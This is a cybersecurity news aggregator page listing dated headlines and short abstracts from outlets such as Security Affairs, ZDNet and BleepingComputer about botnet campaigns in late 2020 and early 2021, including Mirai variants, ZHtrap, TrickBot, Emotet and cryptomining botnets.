April 22, 2021
Pareto Botnet, million infected Android devices conduct fraud in the CTV ad ecosystem Full Text
Abstract
Researchers from Human Security have uncovered a huge botnet of Android devices being used to conduct fraud in the connected TV advertising ecosystem. Security researchers at Human Security (formerly White Ops) discovered a massive Android botnet,...Security Affairs
April 22, 2021
Prometei Botnet Exploits Exchange Server Bugs to Grow Full Text
Abstract
Crypto-mining botnet has been around since 2016Infosecurity Magazine
April 20, 2021
QBot Replaces IcedID in Malspam Campaigns Full Text
Abstract
Cybercriminals were found shuffling payloads once again. Security analysts reported two banking trojans being used alternatively to deliver various ransomware strains as the final payload in recent attacks.Cyware Alerts - Hacker News
April 19, 2021
Bad bot traffic reaching an all-time high over the past year Full Text
Abstract
There was a 372% increase in bad bot traffic on healthcare websites since September 2020. As vaccines became more widely available, bot activity was recorded at rates of 12,000 requests per hour.Help Net Security
April 16, 2021
Mirai code re-use in Gafgyt Full Text
Abstract
Uptycs' threat research team recently detected several variants of the Linux-based botnet malware family, “Gafgyt,”some of them re-used Mirai code. Uptycs' threat research team recently detected several variants of the Linux-based botnet malware...Security Affairs
March 23, 2021
ZHtrap Botnet: Hackers Pitting Against Each Other Full Text
Abstract
A new IoT botnet has been discovered that deploys honeypots to capture attacks from rival botnets and use that information to hijack their infrastructure.Cyware Alerts - Hacker News
March 19, 2021
CISA and FBI warn of ongoing TrickBot attacks Full Text
Abstract
CISA and FBI are warning of ongoing TrickBot attacks despite security firms took down the C2 infrastructure of the infamous botnet in October. The Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI)...Security Affairs
March 18, 2021
CISA alerts of TrickBot trojan attacks Full Text
Abstract
TrickBot uses person-in-the-browser attacks to steal information, such as login credentials. Some of TrickBot’s modules spread the malware laterally across a network by abusing the SMB protocol.CISA
March 18, 2021
Satori: Mirai Botnet Variant Targeting Vantage Velocity Field Unit RCE Vulnerability Full Text
Abstract
Unit 42 researchers observed attempts to exploit CVE-2020-9020, which is a Remote Command Execution (RCE) vulnerability in Iteris’ Vantage Velocity field unit version 2.3.1, 2.4.2, and 3.0.Palo Alto Networks
March 17, 2021
The Rising, Unpredictable Cases of Botnet Threats Full Text
Abstract
A new variant of the Gafgyt botnet that uses the Tor network to target vulnerable D-Link and IoT devices, has been identified by NetLab 360 researchers.Cyware Alerts - Hacker News
March 17, 2021
New ZHtrap botnet uses honeypot to find more victims Full Text
Abstract
Netlab 360 experts discovered a new Mirai-based botnet dubbed ZHtrap that implements honeypot to find more victims. Researchers from Netlab 360 discovered a new Mirai-based botnet dubbed ZHtrap that implements honeypot to find more victims. ZHtrap...Security Affairs
March 17, 2021
Dridex Network Attack Campaign Delivered by Cutwail Botnet and Poisonous PowerShell Scripts Full Text
Abstract
The IBM X-Force threat intelligence team has recently reported that they are continuously witnessing a huge increase in Dridex-related network attacks, and...Cyber Security News
March 16, 2021
New botnet targets network security devices with critical exploits Full Text
Abstract
Authors of a new botnet are targeting connected devices affected by critical-level vulnerabilities, some of them impacting network security devices.BleepingComputer
March 16, 2021
New Mirai Variant and ZHtrap Botnet Malware Emerge in the Wild Full Text
Abstract
Cybersecurity researchers on Monday disclosed a new wave of ongoing attacks exploiting multiple vulnerabilities to deploy Mirai variants on compromised systems. "Upon successful exploitation, the attackers try to download a malicious shell script, which contains further infection behaviors such as downloading and executing Mirai variants and brute-forcers," Palo Alto Networks' Unit 42 Threat Intelligence Team said in a write-up. The rash of vulnerabilities being exploited include: VisualDoor — a SonicWall SSL-VPN remote command injection vulnerability that came to light earlier this January CVE-2020-25506 - a D-Link DNS-320 firewall remote code execution (RCE) vulnerability CVE-2021-27561 and CVE-2021-27562 - Two vulnerabilities in Yealink Device Management that allow an unauthenticated attacker to run arbitrary commands on the server with root privileges CVE-2021-22502 - an RCE flaw in Micro Focus Operation Bridge Reporter (OBR), affecting version 10.40 CVThe Hacker News
March 15, 2021
Trickbot has Filled in Emotet’s Void - Threat Index Report Full Text
Abstract
Check Point lists Trickbot trojan as the most popular malware among cybercriminals in its Global Threat Index report. Here we cover other threats on the list and interesting insights you should know about.Cyware Alerts - Hacker News
March 15, 2021
Police shut down Android app that turned smartphones into proxies Full Text
Abstract
According to Spanish and Europol officials, the app enrolled user devices into another company's network which used the devices as proxy bots in its anonymization offering and for DDoS attacks.The Record
March 15, 2021
ZHtrap Botnet Deploys Honeypots to Trap and Takeover Infected Devices From Competing Botnets Full Text
Abstract
Security researchers discovered last week a new IoT botnet that deploys honeypots to capture attacks from rival botnets and then uses that information to hijack its rivals’ infrastructure.The Record
March 13, 2021
Cryptomining Botnet Targets Unpatched Vulnerabilities in Cloud Servers Full Text
Abstract
An upgraded version of z0Miner, a cryptomining botnet, has been found attempting to take over Jenkins and ElasticSearch servers to mine for Monero cryptocurrency.Cyware Alerts - Hacker News
March 12, 2021
New ZHtrap botnet malware deploys honeypots to find more targets Full Text
Abstract
A new botnet is hunting down and transforming unpatched routers, DVRs, and UPnP network devices it takes over into honeypots that help it find other devices to infect.BleepingComputer
March 10, 2021
Cryptomining Botnet z0Miner Targeting ElasticSearch and Jenkins RCE Vulnerabilities Full Text
Abstract
A crypto mining botnet spotted in the previous year is currently targeting and attempting to take control of Jenkins and ElasticSearch servers...Cyber Security News
March 09, 2021
z0Miner botnet hunts for unpatched ElasticSearch, Jenkins servers Full Text
Abstract
A cryptomining botnet spotted last year is now targeting and attempting to take control of Jenkins and ElasticSearch servers to mine for Monero (XMR) cryptocurrency.BleepingComputer
March 3, 2021
Is Your Browser Extension a Botnet Backdoor? — Krebs on Security Full Text
Abstract
Infatica uses the browser of anyone who has an extension injected with its code to route web traffic for the company’s customers, including marketers or anyone able to afford its subscription charges.Krebs on Security
March 2, 2021
Google: Bad bots are on the attack, and your defence plan is probably wrong Full Text
Abstract
According to the advertising giant, 71% of companies experienced an increase in the number of successful bot attacks, and 56% of companies reported seeing different types of attacks.ZDNet
February 27, 2021
A Botnet Campaign that Uses Blockchain Transactions to Stay Hidden Full Text
Abstract
Akamai finds a long-running cryptomining botnet campaign wherein hackers exploit BTC blockchain transactions to evade detection by the security systems in place.Cyware Alerts - Hacker News
February 26, 2021
Yeezy Fans Face Sneaker-Bot Armies for Boost ‘Sun’ Release Full Text
Abstract
Sneaker bots ready to scoop up the new Yeezy Boost 700 “Sun” shoes to resell at a huge markup.Threatpost
February 24, 2021
A Cryptomining botnet abuses Bitcoin blockchain transactions as C2 backup mechanism Full Text
Abstract
Crooks are exploiting BTC blockchain transactions to hide backup command-and-control (C2) server addresses for a cryptomining botnet. Security experts from Akamai have spotted a new botnet used for illicit cryptocurrency mining activities that are abusing...Security Affairs
February 24, 2021
Operators of Cryptomining Botnet Hide Their Backup Communication Behind Bitcoin Blockchain Transactions Full Text
Abstract
The attack chain begins with the exploit of remote code execution (RCE) vulnerabilities impacting software including Hadoop Yarn and Elasticsearch, such as CVE-2015-1427 and CVE-2019-9082.ZDNet
February 22, 2021
Watch Out for WatchDog Full Text
Abstract
WatchDog, the cryptomining malware, has been found to be running undetected for more than two years. The botnet has hijacked at least 476 Windows and Linux devices, to date.Cyware Alerts - Hacker News
February 18, 2021
WatchDog botnet targets Windows and Linux servers in cryptomining campaign Full Text
Abstract
PaloAlto Network warns of the WatchDog botnet that uses exploits to take over Windows and Linux servers and mine cryptocurrency. Security researchers at Palo Alto Networks uncovered a cryptojacking botnet, tracked as WatchDog, that is targeting Windows...Security Affairs
February 08, 2021
Microsoft: Keep your guard up even after Emotet’s disruption Full Text
Abstract
Microsoft warns customers not to let their guard down even after hundreds of Emotet botnet servers were taken down in late January 2021.BleepingComputer
January 25, 2021
Cryptomining DreamBus botnet targets Linux servers Full Text
Abstract
Zscaler’s research team recently spotted a Linux-based malware family, tracked as DreamBus botnet, targeting Linux servers. Researchers at Zscaler’s ThreatLabZ research team recently analyzed a Linux-based malware family, tracked as DreamBus Botnet,...Security Affairs
January 25, 2021
DreamBus botnet targets enterprise apps running on Linux servers Full Text
Abstract
Analyzed in a report published last week by security firm Zscaler, the company said this new threat is a variant of an older botnet named SystemdMiner, first seen in early 2019.ZDNet
January 24, 2021
How to Protect Your IoT Devices From Botnet Attacks Full Text
Abstract
IoT devices allow us to connect everything and make our environment smart. However, the technology has always been marred by insecurity, with...Cyber Security News
January 23, 2021
DreamBus Botnet Targets Linux Systems Full Text
Abstract
DreamBus presents a serious threat because of the many components it uses to spread via the internet and the wormlike behavior that enables it to move laterally once inside a targeted system, ThreatLabz says.Gov Info Security
January 19, 2021
New FreakOut botnet targets Linux systems running unpatched software Full Text
Abstract
Its current targets include TerraMaster data storage units, web applications built on top of the Zend PHP Framework, and websites running the Liferay Portal content management system.ZDNet
January 19, 2021
FreakOut botnet target 3 recent flaws to compromise Linux devices Full Text
Abstract
Security researchers uncovered a series of attacks conducted by the FreakOut botnet that leveraged recently discovered vulnerabilities. Security researchers from Check Point have uncovered a series of attacks associated with the FreakOut botnet that...Security Affairs
January 12, 2021
TeamTNT Botnet Further Evolves with Environment Setup Capabilities Full Text
Abstract
Researchers have linked recent TeamTNT botnet activity to extraction and stealing of Docker and AWS credentials. Previously, it would mine cryptocurrency only on misconfigured container platforms.Cyware Alerts - Hacker News
January 10, 2021
TeamTNT botnet now steals Docker API and AWS credentials Full Text
Abstract
Researchers from Trend Micro discovered that the TeamTNT botnet is now able to steal Docker API logins along with AWS credentials. Researchers from Trend Micro discovered that the TeamTNT botnet was improved and is now able to steal also Docker credentials. The...Security Affairs
January 9, 2021
A crypto-mining botnet is now stealing Docker and AWS credentials Full Text
Abstract
Researchers have linked the botnet to a cybercrime operation known as TeamTNT; a group first spotted over the 2020 summer installing cryptocurrency-mining malware on misconfigured container platforms.ZDNet
January 7, 2021
The Evolution of Bad Bots from Grinchbots to Parasitic Bots-as-a-Service Full Text
Abstract
The use of scalping bots was once the domain of tickets for sporting events or concerts. But recently, it has become increasingly prevalent in e-commerce and online retail.Imperva
December 26, 2020
The Emotet botnet is back and hits 100K recipients per day Full Text
Abstract
Emotet is back on Christmas Eve, cybercrime operators are sending out spam messages to deliver the infamous Trickbot Trojan. Emotet is back on Christmas Eve, after two months of silence, cybercrime operators are sending out spam messages to deliver...Security Affairs
December 25, 2020
Emotet Shows up to Wish Merry Christmas Full Text
Abstract
Emotet botnet has returned a fter a two-month hiatus with Christmas and COVID-19-themed campaigns that touch base with at least 100,000 targets per day.Cyware Alerts - Hacker News
December 23, 2020
Tool shows what bad bot traffic ‘sounds’ like. Is there a practical application? Full Text
Abstract
“Botronica” translates human bot traffic into sounds as a creative way to generate awareness of malicious bot activity.SCMagazine
December 19, 2020
Gitpaste-12 worm botnet returns with 30+ vulnerability exploits Full Text
Abstract
Recently discovered Gitpaste-12 worm that spreads via GitHub and also hosts malicious payload on Pastebin, has returned with over 30 vulnerability exploits, according to researchers at Juniper Labs.BleepingComputer
December 17, 2020
Gitpaste-12 Botnet Evolves to Take More Devices in its Trap Full Text
Abstract
The malware derives its name from GitHub, and Pastebin - which are used for propagation - and 12 different exploits for previously-known vulnerabilities.Cyware Alerts - Hacker News
December 15, 2020
Wormable Gitpaste-12 Botnet Returns to Target Linux Servers, IoT Devices Full Text
Abstract
A new wormable botnet that spreads via GitHub and Pastebin to install cryptocurrency miners and backdoors on target systems has returned with expanded capabilities to compromise web applications, IP cameras, and routers. Early last month, researchers from Juniper Threat Labs documented a crypto-mining campaign called " Gitpaste-12 ," which used GitHub to host malicious code containing as many as 12 known attack modules that are executed via commands downloaded from a Pastebin URL. The attacks occurred during a 12-day period starting from October 15, 2020, before both the Pastebin URL and repository were shut down on October 30, 2020. Now according to Juniper, the second wave of attacks began on November 10 using payloads from a different GitHub repository, which, among others, contains a Linux crypto-miner ("ls"), a file with a list of passwords for brute-force attempts ("pass"), and a local privilege escalation exploit for x86_64 Linux systems. ThThe Hacker News